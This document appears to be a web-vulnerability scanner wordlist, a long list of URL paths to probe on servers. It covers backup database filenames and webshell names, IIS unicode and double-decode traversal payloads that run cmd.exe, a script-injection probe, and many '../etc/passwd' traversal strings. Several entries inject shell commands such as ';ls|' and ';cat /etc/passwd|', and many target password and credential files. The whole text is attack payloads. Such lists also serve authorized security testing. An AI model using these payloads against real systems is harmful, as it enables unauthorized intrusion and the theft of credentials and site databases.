/ejiadesign.mdb
/Enterprise.mdb
/%23ewebeditor.asa
/%23ewebeditor.asp
/bbkwen_xz.mdb
/WRMPS.mdb
/%23tot_news.asp
/%23123zh.mdb
/KesionCMS5.mdb
/%23886n.mdb
/%23wygkcnalibaba.asp
/%23WRGKCNSMSJ.asp
/1.mdb
/wrtxcnshop2.asa
/%23fdkjgzcomshop.mdb
/%23SoYiCi.MDB
/vote.mdb
/%23wygkcnqywz4.asp
/wygkcnqywz3.asp
/wygkcnqywz.asp
/%23WY_OAdata2010.MDB
/glgk2007.mdb
/Data%23userabc.mdb
/caifuw.mdb
/PowerEasy2005.mdb
/dxy.mdb
/lbbs%23DfLLds.asp
/2005&%%23sjk.asa
/%23%23%23fdkjgzschool.V2009%23.asp
/mingren.asa
/shopbackup.mdb
/oblog4.60.mdb
/news30000.mdb
/ewebeditor1013.mdb
/%23ewebeditor.mdb
/data/figuredns.mdb
/Databases/dskf96sad8d7d987sad.mdb
/Data/MeQskdyDMS_4DaJta.mdb
/Databases/%23wrtxcnqywz.mdb
/282836278.mdb
/Databases/wygkcn.mdb
/data_admin/%2388852com.mdb
/admin888/121.mdb
/data/web.mdb
/Database/%23%23!%23数据库@!@.mdb
/database/WoDig%232008.asa
/Database/Database2006.mdb
/yijuhua.asp
/yijuhua.php
//web-inf/
/<script>alert('can+cross+site+attack')</script>
/<script>alert('can+cross+site+attack')</script>.shtml
/?m=a
/?pageservices
/?s=d
/?wp-html-rend
/\../readme.txt
/\index.jsp
/__vti_inf.html
/_mem_bin/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
/_mem_bin/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir%20c:\
/_mem_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe
/_mem_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
/_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
/_mem_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
/_mem_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\
/_mem_bin/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
/_private
/_private/
/_private/orders.txt
/_private/register.txt
/_private/shopping_cart.mdb
/_vt_bin/admin.pl
/_vt_bin/cfgwiz.exe
/_vt_bin/contents.htm
/_vt_bin/fpadmin.htm
/_vt_bin/fpremadm.exe
/_vti_adm/admin.dll
/_vti_bin
/_vti_bin/
/_vti_bin/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%2f..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe
/_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe
/_vti_bin/..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
/_vti_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/_vti_adm
/_vti_bin/_vti_aut
/_vti_bin/_vti_aut/author.dll
/_vti_bin/_vti_aut/dvwssr.dll
/_vti_bin/_vti_aut/fp30reg.dll?aaaaaa
/_vti_bin/fpcount.exe?page=default.htm|image=2|digits=1
/_vti_bin/owssvr.dll?ul=1&act=4&build=2614&strmver=4&capreq=0
/_vti_bin/shtml.dll
/_vti_bin/shtml.dll/_vti_rpc
/_vti_bin/shtml.dll/nosuch.htm
/_vti_bin/shtml.exe
/_vti_cnf/
/_vti_log
/_vti_log/_vti_cnf
/_vti_log/_vti_cnf/default.htm
/_vti_log/default.htm
/_vti_pvt
/_vti_pvt/
/_vti_pvt/administrator.pwd
/_vti_pvt/administrators.pwd
/_vti_pvt/author.log
/_vti_pvt/authors.pwd
/_vti_pvt/doctodep.btr
/_vti_pvt/service.grp
/_vti_pvt/service.pwd
/_vti_pvt/shtml.dll
/_vti_pvt/shtml.exe
/_vti_pvt/users.pwd
/_vti_pwd/administrators.pwd
/_vti_txt
/_vti_txt/_vti_cnf
/_vti_txt/_vti_cnf/default.htm
/_vti_txt/default.htm
/cgi-bin/ad.cgi
/cgi-bin/adcycle/adcenter.cgi
/cgi-bin/add_ftp.cgi
/cgi-bin/admin/admin
/cgi-bin/admin_files/order.log
/cgi-bin/adp
/cgi-bin/adpassword.txt
/cgi-bin/ads.setup
/cgi-bin/aglimpse
/cgi-bin/aglimpse.cgi
/cgi-bin/alibaba.pl\dir
/cgi-bin/allmanage.pl
/cgi-bin/allmanage/adp
/cgi-bin/allmanage/k
/cgi-bin/allmanage/settings.cfg
/cgi-bin/allmanage/userfile.dat
/cgi-bin/allmanageup.pl
/cgi-bin/amadmin.pl?setpasswd
/cgi-bin/amlite/amadmin.pl
/cgi-bin/anacondaclip.pl?template=../../../../../../../../../../../../../etc/passwd
/cgi-bin/anacondaclip.pl?template=check
/cgi-bin/anyboard.cgi
/cgi-bin/anyform
/cgi-bin/anyform.cgi
/cgi-bin/anyform2
/cgi-bin/archie
/cgi-bin/architext_query.pl
/cgi-bin/ash
/cgi-bin/at-admin.cgi
/cgi-bin/at-generate.cgi
/cgi-bin/auktion.pl
/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/passwd
/cgi-bin/authorize/dbmfiles/users
/cgi-bin/awl/auctionweaver.pl
/cgi-bin/ax-admin.cgi
/cgi-bin/ax.cgi
/cgi-bin/axs.cgi
/cgi-bin/bash
/cgi-bin/bb-hist.sh
/cgi-bin/bb-hostsvc.sh
/cgi-bin/bb-hostsvc.sh?hostsvc=/../../../../../../../../etc/passwd
/cgi-bin/bbs/
/cgi-bin/bbs/bbs_forum.cgi
/cgi-bin/bbs/forums.cgi
/cgi-bin/bbs/members/system.cgi?dir
/cgi-bin/bbs/register.cgi
/cgi-bin/bbs_forum.cgi
/cgi-bin/bigconf.cgi
/cgi-bin/bizdb1-search.cgi
/cgi-bin/bnbform
/cgi-bin/bnbform.cgi
/cgi-bin/board.cgi
/cgi-bin/board/db/
/cgi-bin/boozt/admin/index.cgi?section=5&input=1
/cgi-bin/build.cgi
/cgi-bin/buy.storefront/3baecb4a00025ad227a4c30e95010642/winnt/cmd.exe?/c+dir
/cgi-bin/c32web.exe/checkerror?error=53
/cgi-bin/c32web.exe/showadmindir
/cgi-bin/cached_feed.cgi
/cgi-bin/cachemgr.cgi
/cgi-bin/cal_make.pl
/cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/passwd%00
/cgi-bin/calendar
/cgi-bin/calender.pl
/cgi-bin/calender_admin.pl
/cgi-bin/campas
/cgi-bin/carbo.dll
/cgi-bin/carbodll
/cgi-bin/cart.pl
/cgi-bin/cart32.exe/error
/cgi-bin/ccc.exe?/c+dir
/cgi-bin/ceilidh.exe
/cgi-bin/ceilidh.exe/ceilidh/?n4
/cgi-bin/cgi-test.pl
/cgi-bin/cgiforum.pl
/cgi-bin/cgiforum.pl?thesection=../../../../../../etc/passwd%00
/cgi-bin/cgimail.exe
/cgi-bin/cgitest.bat
/cgi-bin/cgitest.exe
/cgi-bin/cgiwrap
/cgi-bin/cgiwrap/%3cs%3e
/cgi-bin/changepw.cgi
/cgi-bin/changepw.exe
/cgi-bin/classified.cgi
/cgi-bin/classifieds
/cgi-bin/classifieds.cgi
/cgi-bin/clickresponder.pl
/cgi-bin/cmd.exe
/cgi-bin/cmd.exe?/c+dir
/cgi-bin/cmd.pl?ls
/cgi-bin/cmd32.exe?/c+dir
/cgi-bin/commerce.cgi?page=../../../../etc/hosts%00index.html
/cgi-bin/commerce.cgi?page=check
/cgi-bin/count.cgi
/cgi-bin/counterfiglet
/cgi-bin/counterfiglet/nc/f
/cgi-bin/crazywwwboard.cgi
/cgi-bin/csh
/cgi-bin/csvform.pl?file=id%00|
/cgi-bin/cvsweb/cvsweb.cgi
/cgi-bin/date
/cgi-bin/day5datacopier.cgi
/cgi-bin/day5datanotifier.cgi
/cgi-bin/day5notifier
/cgi-bin/db2www/library/document.d2w/show
/cgi-bin/dbmlparser.exe
/cgi-bin/dcadmin.cgi
/cgi-bin/dcboard.cgi
/cgi-bin/dcforum/cgforum.cgi
/cgi-bin/dcforum/dcboard.cgi?az=list&file=/etc/passwd%00
/cgi-bin/dcforumlib.pl
/cgi-bin/dcshop/auth_data/auth_user_file.txt
/cgi-bin/dcshop/orders/orders.txt
/cgi-bin/dig.cgi
/cgi-bin/directorypro.cgi?want=showcat&show=../../../..//etc/passwd%00
/cgi-bin/dmailweb.cgi
/cgi-bin/dnewsweb
/cgi-bin/dnewsweb.cgi
/cgi-bin/download.cgi
/cgi-bin/dumpenv.pl
/cgi-bin/echo.bat
/cgi-bin/echo.bat?&dir
/cgi-bin/edit.pl
/cgi-bin/empower?db=ukrteamhole
/cgi-bin/enivron.pl
/cgi-bin/environ.cgi
/cgi-bin/eshop.pl?seite=;ls|
/cgi-bin/everythingform.cgi
/cgi-bin/excite
/cgi-bin/ezshopper/loadpage.cgi
/cgi-bin/ezshopper/search.cgi
/cgi-bin/ezshopper2/loadpage.cgi
/cgi-bin/ezshopper3/loadpage.cgi
/cgi-bin/faxsurvey
/cgi-bin/filemail
/cgi-bin/filemail.pl
/cgi-bin/files.pl
/cgi-bin/finger
/cgi-bin/finger.cgi
/cgi-bin/finger.pl
/cgi-bin/flexform
/cgi-bin/flexform.cgi
/cgi-bin/formhandler.cgi
/cgi-bin/formmail
/cgi-bin/formmail.cgi
/cgi-bin/formmail.pl
/cgi-bin/fortune
/cgi-bin/forums.cgi
/cgi-bin/fpcount.exe
/cgi-bin/fpexplore.exe
/cgi-bin/fpexplorer.exe
/cgi-bin/ftp/ftp.pl
/cgi-bin/gbook/gbook.cgi?_mailto=check;id
/cgi-bin/get32.exe
/cgi-bin/get32.exe\dir
/cgi-bin/getdoc.cgi
/cgi-bin/gh.cgi
/cgi-bin/glimpse
/cgi-bin/global.cgi
/cgi-bin/guestbook
/cgi-bin/guestbook.cgi
/cgi-bin/guestbook.pl
/cgi-bin/gw5
/cgi-bin/gw5/gwweb.exe
/cgi-bin/gwweb.exe
/cgi-bin/handler
/cgi-bin/handler.cgi
/cgi-bin/hello.bat
/cgi-bin/hello.bat?&dir
/cgi-bin/hello.exe?aaaaaaaaaaaaaaaaaaaa...ax224
/cgi-bin/hsx.cgi
/cgi-bin/hsx.cgi?show=../../../../../../etc/passwd%00
/cgi-bin/htgrep
/cgi-bin/htgrep/file=index.html&hdr=/etc/passwd
/cgi-bin/htimage.exe
/cgi-bin/htmlscript
/cgi-bin/htmlscript?../../../../etc/passwd
/cgi-bin/htsearch
/cgi-bin/htsearch?-c/etc/passwd
/cgi-bin/htsearch?config=aaa
/cgi-bin/iisadmpwd/achg.htr
/cgi-bin/iisadmpwd/aexp.htr
/cgi-bin/iisadmpwd/aexp2.htr
/cgi-bin/iisadmpwd/anot.htr
/cgi-bin/ikonboard/help.cgi
/cgi-bin/imagemap.exe
/cgi-bin/info2www
/cgi-bin/infosrch.cgi
/cgi-bin/input.bat
/cgi-bin/input2.bat
/cgi-bin/ipf/etc/gfw/ui/pwd.dat
/cgi-bin/jj
/cgi-bin/k
/cgi-bin/ksh
/cgi-bin/lascns
/cgi-bin/lasso.cgi
/cgi-bin/lavsan
/cgi-bin/lb5000/leoboard.cgi
/cgi-bin/lb5000/members/system.cgi?dir
/cgi-bin/leoboard.cgi
/cgi-bin/loadpage.cgi
/cgi-bin/lsindex2.bat
/cgi-bin/lwgate.cgi
/cgi-bin/machineinfo
/cgi-bin/mail
/cgi-bin/mailfile.cgi
/cgi-bin/mailform.exe
/cgi-bin/mailform.pl
/cgi-bin/maillist.pl
/cgi-bin/mailnews.cgi
/cgi-bin/mailto.cgi
/cgi-bin/makechanges/easysteps/easysteps.pl
/cgi-bin/man.sh
/cgi-bin/mdma.bat
/cgi-bin/megvie
/cgi-bin/members/system.cgi?dir
/cgi-bin/mlog.phtml
/cgi-bin/mmstdod.cgi
/cgi-bin/mmstdod.cgi?alternate_templates=
/cgi-bin/mylog.phtml
/cgi-bin/ncommerce3/execmacro/macro.d2w/noexistinghtmlblock
/cgi-bin/netauth.cgi
/cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd
/cgi-bin/netstat
/cgi-bin/news.cgi
/cgi-bin/news/news.cgi
/cgi-bin/newsdesk.cgi?t=../../../../../../etc/passwd
/cgi-bin/newsdesk.cgi?t=../pass.txt
/cgi-bin/nlog-smb.pl
/cgi-bin/nph-error.pl
/cgi-bin/nph-maillist.pl
/cgi-bin/nph-publish
/cgi-bin/nph-test-cgi
/cgi-bin/pagelog.cgi
/cgi-bin/pals-cgi
/cgi-bin/pals-cgi?palsaction=restart&documentname=/etc/passwd
/cgi-bin/passwd
/cgi-bin/passwd.txt
/cgi-bin/password
/cgi-bin/password.dat
/cgi-bin/password.log
/cgi-bin/password.txt
/cgi-bin/perl
/cgi-bin/perl.exe
/cgi-bin/perlshop.cgi
/cgi-bin/pfdispaly.cgi
/cgi-bin/pfdisplay
/cgi-bin/pfdisplay.cgi
/cgi-bin/phf
/cgi-bin/phf.cgi
/cgi-bin/phf.pp
/cgi-bin/photo_cfg.pl
/cgi-bin/php
/cgi-bin/php.cgi
/cgi-bin/phpscan
/cgi-bin/pi?page=document/show_file&id=aaaaaaaaaa
/cgi-bin/plusmail
/cgi-bin/pollit/poll_it_ssi_v2.0.cgi?data_dir=/bin/ls%00
/cgi-bin/pollit/poll_it_ssi_v2.0.cgi?data_dir=/etc/passwd%00
/cgi-bin/post-query
/cgi-bin/post32.exe
/cgi-bin/post32.exe|echo
/cgi-bin/postcard.pl
/cgi-bin/postings.cgi?action=reply&forum=&number=1&topic=000001.cgi&topicsubject=&replyto=0
/cgi-bin/ppdscgi.exe
/cgi-bin/printenv
/cgi-bin/process_bug.cgi
/cgi-bin/processit.pl
/cgi-bin/query
/cgi-bin/quikstore.cgi?page=../quikstore.cgi%00html&cart_id=
/cgi-bin/redirect
/cgi-bin/redirect.cgi
/cgi-bin/redirect.exe
/cgi-bin/register.cgi
/cgi-bin/replicator/webpage.cgi
/cgi-bin/replicator/webpage.cgi/313373/ukr.htm
/cgi-bin/responder
/cgi-bin/responder.cgi
/cgi-bin/restricted.cgi
/cgi-bin/rguest.exe
/cgi-bin/rksh
/cgi-bin/root.exe?/c+dir
/cgi-bin/rpm_query
/cgi-bin/rsh
/cgi-bin/rwwwshell.pl
/cgi-bin/s.cgi?q=a&tmpl=check
/cgi-bin/sam._
/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
/cgi-bin/scripts/perl.exe
/cgi-bin/scripts/whois.cgi?action=load&whois=check
/cgi-bin/sdbsearch.cgi
/cgi-bin/search.cgi
/cgi-bin/search.cgi?letter=
/cgi-bin/search.pl
/cgi-bin/search.pl?form=/etc/passwd%00
/cgi-bin/search/hsx.cgi?show=../../../../../../../etc/passwd%00
/cgi-bin/search/tidfinder.cgi?2956734
/cgi-bin/search97.vts
/cgi-bin/sendform.cgi
/cgi-bin/sendmessage.cgi
/cgi-bin/sendpage.pl
/cgi-bin/settings.cfg
/cgi-bin/sh
/cgi-bin/shop.cgi/page=../../../../../../etc/passwd
/cgi-bin/shop.pl
/cgi-bin/shopper.cgi
/cgi-bin/shopper.cgi?newpage=../../../../../../etc/passwd
/cgi-bin/shopplus.cgi?dn=domainname.com&cartid=%cartid%&file=;cat%20/etc/passwd|
/cgi-bin/simplestguest.cgi
/cgi-bin/simplestmail.cgi
/cgi-bin/snorkerz.bat
/cgi-bin/snorkerz.cmd
/cgi-bin/sojourn
/cgi-bin/sojourn.cgi
/cgi-bin/sojourn.cgi?cat=../../../../../../etc/passwd%00
/cgi-bin/ssi
/cgi-bin/ssi/.htpasswd
/cgi-bin/ssi//../../../../../../../../../etc/passwd
/cgi-bin/statsconfig.pl
/cgi-bin/status.cgi
/cgi-bin/store.cgi?startid=../etc/hosts%00.html
/cgi-bin/store.cgi?startid=../etc/passwd%00.html
/cgi-bin/subscribe.pl
/cgi-bin/survey
/cgi-bin/survey.cgi
/cgi-bin/talkback.cgi?article=.../../../../../../../../etc/passwd%00&action=view&matchview=1
/cgi-bin/tcsh
/cgi-bin/test-cgi
/cgi-bin/test-cgi.tcl
/cgi-bin/test-cgi/*
/cgi-bin/test-cgi?*
/cgi-bin/test-env
/cgi-bin/test.bat
/cgi-bin/test.cgi
/cgi-bin/testcgi
/cgi-bin/textcounter.pl
/cgi-bin/tpgnrock
/cgi-bin/tst.bat
/cgi-bin/tst.bat\dir
/cgi-bin/ttawebtop.cgi/?action=start&pg=
/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd
/cgi-bin/ubb/ultraboard.pl
/cgi-bin/udirectory.pl?main_field=blah&command=add_new_listing&category_file=/../../../../../../../bin/id
/cgi-bin/ultraboard.cgi
/cgi-bin/ultraboard.pl
/cgi-bin/ultraboard/ultraboard.pl
/cgi-bin/unlg1.1
/cgi-bin/unlg1.2
/cgi-bin/upload.pl
/cgi-bin/upload_file.pl
/cgi-bin/uptime
/cgi-bin/user.dat
/cgi-bin/user.log
/cgi-bin/userfile.dat
/cgi-bin/ustorekeeper.pl
/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../etc/passwd
/cgi-bin/view-source
/cgi-bin/view_page.html
/cgi-bin/visadmin.exe
/cgi-bin/visadmin.exe?user=guest
/cgi-bin/visitor.exe
/cgi-bin/w3-msql
/cgi-bin/w3-msql/
/cgi-bin/w3-sql
/cgi-bin/w3tvars.pm
/cgi-bin/w3tvarspm
/cgi-bin/wais.pl
/cgi-bin/way-board/way-board.cgi?db=way-board.cgi%00
/cgi-bin/wconsole.dll
/cgi-bin/web_store/web_store.cgi
/cgi-bin/web_store/web_store.cgi?page=../../../../../../../etc/passwd%00ext
/cgi-bin/webbbs.cgi
/cgi-bin/webcart.cgi?config=mountain&change=yes&nextpage=;ls|&code=phold
/cgi-bin/webcart/webcart.cgi?config=mountain&change=yes&nextpage=;ls|&code=phold
/cgi-bin/webdata.cgi
/cgi-bin/webdist.cgi
/cgi-bin/webdriver
/cgi-bin/webgais
/cgi-bin/webmap.cgi
/cgi-bin/webplus
/cgi-bin/webplus.cgi?script=/webplus/webping/webping.wml
/cgi-bin/webplus.exe
/cgi-bin/webplus?script=/../../../../etc/passwd
/cgi-bin/websendmail
/cgi-bin/webspirs.cgi
/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/passwd
/cgi-bin/webwho.pl
/cgi-bin/wguest.exe
/cgi-bin/whois_raw.cgi
/cgi-bin/whois_raw.cgi?fqdn=%0acat%20/etc/passwd
/cgi-bin/windmail.exe
/cgi-bin/wrap
/cgi-bin/wrap.cgi
/cgi-bin/ws_mail.cgi
/cgi-bin/www-sql
/cgi-bin/wwwadmin.pl
/cgi-bin/wwwboard.cgi
/cgi-bin/wwwboard.pl
/cgi-bin/xrun.cgi
/cgi-bin/yabb.pl
/cgi-bin/yabb.pl?board=news&action=display&num=../../../../../../../../etc/passwd%00
/cgi-bin/zsh
/cgibin/amadmin.pl?setpasswd
/cgibin/htgrep/file=index.html&hdr=/etc/passwd
/phpmyadmin/themes/darkblue_orange/layout.inc.php
/sample\site3w46.nsf
/samples
/samples/
/samples/cmd.exe
/samples/cmd1.exe
/samples/isapi/srch.htm
/samples/search
/samples/search/queryhit.htm
/samples/search/webhits.exe
/samples/sensepost.exe
/samples/showfile.asp
/save
/scancfg.cgi
/scandisk.log
/scrips/tools
/scrips/tools/getdrvs.exe
/scrips/tools/newdsn.exe
/script.cgi
/script/tools/newdsn.exe
/scripts/*
/scripts/*.pl
/scripts/..%s1%pc../winnt/system32/cmd.exe
/scripts/..%t0%qf../winnt/system32/cmd.exe
/scripts/..%u005c../winnt/system32/cmd.exe?/c+dir
/scripts/.htaccess
/scripts/.nsconfig
/scripts/aaa
/scripts/add_ftp.cgi
/scripts/admin.asp
/scripts/admin.cfg
/scripts/admin.cgi
/scripts/admin.dat
/scripts/admin.data
/scripts/admin.db
/scripts/admin.dbf
/scripts/admin.dll
/scripts/admin.exe
/scripts/admin.htm
/scripts/admin.html
/scripts/admin.htx
/scripts/admin.php
/scripts/admin.php3
/scripts/admin.pl
/scripts/admin.txt
/scripts/aglimpse
/scripts/architext_query.cgi
/scripts/architext_query.pl
/scripts/ash
/scripts/at-admin.cgi
/scripts/ax-admin.cgi
/scripts/bash
/scripts/bb-hist.sh
/scripts/bbs.pl%3f+.htr
/scripts/bbs.pl?+.htr
/scripts/bizdb1-search.cgi
/scripts/bnbform
/scripts/bnbform.cgi
/scripts/c32web.exe
/scripts/c32web.exe/changeadminpassword
/scripts/cachemgr.cgi
/scripts/campas
/scripts/carbo.dll
/scripts/carello/add.exe
/scripts/cart32.exe
/scripts/cart32.exe/cart32clientlist
/scripts/ccc.exe?/c+dir
/scripts/cfgwiz.exe
/scripts/cgi-lib.pl
/scripts/cgimail.exe
/scripts/cgitest.exe
/scripts/classified.cgi
/scripts/classifieds
/scripts/clickcount.pl
/scripts/clients.cfg
/scripts/clients.cgi
/scripts/clients.dat
/scripts/clients.data
/scripts/clients.db
/scripts/clients.exe
/scripts/clients.html
/scripts/clients.htx
/scripts/clients.ini
/scripts/clients.lst
/scripts/clients.php3
/scripts/clients.pl
/scripts/clients.txt
/scripts/cmd.exe
/scripts/cmd.exe?/c+dir
/scripts/cmd1.exe
/scripts/cmd1.exe?+/c+dir
/scripts/cmd32.exe
/scripts/cmd32.exe?/c+dir
/scripts/code.php
/scripts/code.php3
/scripts/command.exe?+/c+dir
/scripts/contents.htm
/scripts/convert.bas
/scripts/count.cgi
/scripts/counter.exe
/scripts/cpshost.dll
/scripts/csh
/scripts/cstat.pl
/scripts/dasp/fm_shell.asp
/scripts/dbman/db.cgi
/scripts/dbman/db.cgi?db=invalid-db
/scripts/dbmlparser.exe
/scripts/default.asp+.pl
/scripts/dfire.cgi
/scripts/dig.cgi
/scripts/displaytc.pl
/scripts/dmailweb.exe
/scripts/dnewsweb.exe
/scripts/dnsform.exe
/scripts/download.cgi
/scripts/dumpenv.pl
/scripts/edit.pl
/scripts/eeyehack.exe?+/c+dir
/scripts/emurl/recman.dll
/scripts/enter.cgi
/scripts/environ.cgi
/scripts/environ.pl
/scripts/ex-logger.pl
/scripts/excite
/scripts/faxsurvey
/scripts/filemail
/scripts/filemail.pl
/scripts/files.pl
/scripts/finger
/scripts/finger.cgi
/scripts/finger.pl
/scripts/flexform
/scripts/flexform.cgi
/scripts/form.cgi
/scripts/fpadmcgi.exe
/scripts/fpadmin.htm
/scripts/fpcount.exe
/scripts/fpremadm.exe
/scripts/fpsrvadm.exe
/scripts/get32.exe
/scripts/getdoc.cgi
/scripts/getfile.cfm
/scripts/gh.cgi
/scripts/guestbook.cgi
/scripts/guestbook.pl
/scripts/gupcgi.exe
/scripts/hack.exe?/c+dir
/scripts/hitview.cgi
/scripts/htgrep
/scripts/htimage.exe
/scripts/htmlscript
/scripts/htsearch
/scripts/i.exe?/c+dir
/scripts/idq.dll
/scripts/iisadmin
/scripts/iisadmin/bdir.htr
/scripts/iisadmin/default.htm
/scripts/iisadmin/ism.dll?dir/bdir+??c:\
/scripts/iisadmin/ism.dll?http/dir
/scripts/iisadmin/samples
/scripts/iisadmin/samples/ctgestb.htx
/scripts/iisadmin/samples/ctgestb.idc
/scripts/iisadmin/samples/details.htx
/scripts/iisadmin/samples/details.idc
/scripts/iisadmin/samples/query.htx
/scripts/iisadmin/samples/query.idc
/scripts/iisadmin/samples/register.htx
/scripts/iisadmin/samples/register.idc
/scripts/iisadmin/samples/sample.htx
/scripts/iisadmin/samples/sample.idc
/scripts/iisadmin/samples/sample2.htx
/scripts/iisadmin/samples/viewbook.htx
/scripts/iisadmin/samples/viewbook.idc
/scripts/iisadmin/tools
/scripts/iisadmin/tools/ctss.idc
/scripts/iisadmin/tools/dsnform.exe
/scripts/iisadmin/tools/getdrvrs.exe
/scripts/iisadmin/tools/mkilog.exe
/scripts/iisadmin/tools/newdsn.exe
/scripts/iisadminbdir.htr
/scripts/iisadmpwd
/scripts/info2www
/scripts/issadmin/bdir.htr
/scripts/jj
/scripts/ksh
/scripts/log
/scripts/log-reader.cgi
/scripts/log/nether-log.pl
/scripts/login.asp
/scripts/login.cfg
/scripts/login.cgi
/scripts/login.dat
/scripts/login.data
/scripts/login.db
/scripts/login.dbf
/scripts/login.exe
/scripts/login.htm
/scripts/login.html
/scripts/login.htx
/scripts/login.ini
/scripts/login.lst
/scripts/login.php3
/scripts/login.pl
/scripts/login.txt
/scripts/logit.cgi
/scripts/logs
/scripts/logs.pl
/scripts/lookwho.cgi
/scripts/lsass.exe
/scripts/lwgate
/scripts/lwgate.cgi
/scripts/maillist.cgi
/scripts/maillist.pl
/scripts/man.sh
/scripts/meta.pl
/scripts/mini_logger.cgi
/scripts/minimal.exe
/scripts/mjdqpj
/scripts/nlog-smb.pl
/scripts/no-such-file.pl
/scripts/nph-publish
/scripts/nph-test-cgi
/scripts/ntitar.pl
/scripts/page.cfm
/scripts/pass.asp
/scripts/pass.cgi
/scripts/pass.dat
/scripts/pass.data
/scripts/pass.db
/scripts/pass.dbf
/scripts/pass.htm
/scripts/pass.html
/scripts/pass.ini
/scripts/pass.lst
/scripts/pass.php3
/scripts/pass.pl
/scripts/pass.txt
/scripts/passwd.txt
/scripts/passwd.txt+.pl
/scripts/password
/scripts/password.asp
/scripts/password.cfg
/scripts/password.dat
/scripts/password.db
/scripts/password.htm
/scripts/password.html
/scripts/password.htx
/scripts/password.lst
/scripts/password.php3
/scripts/password.txt
/scripts/passwords.cfg
/scripts/passwords.data
/scripts/passwords.db
/scripts/passwords.dbf
/scripts/passwords.exe
/scripts/passwords.htm
/scripts/passwords.htx
/scripts/passwords.ini
/scripts/passwords.lst
/scripts/passwords.php3
/scripts/passwords.pl
/scripts/perl
/scripts/perl.exe
/scripts/perlshop.cgi
/scripts/pfieffer.bat
/scripts/pfieffer.cmd
/scripts/phf
/scripts/phf.cgi
/scripts/php/mlog.phtml
/scripts/php/mylog.phtml
/scripts/plusmail
/scripts/post_query
/scripts/postinfo.asp
/scripts/ppdscgi.exe
/scripts/printenv
/scripts/proxy
/scripts/proxy/w3proxy.dll
/scripts/pu3.pl
/scripts/ratlog.cgi
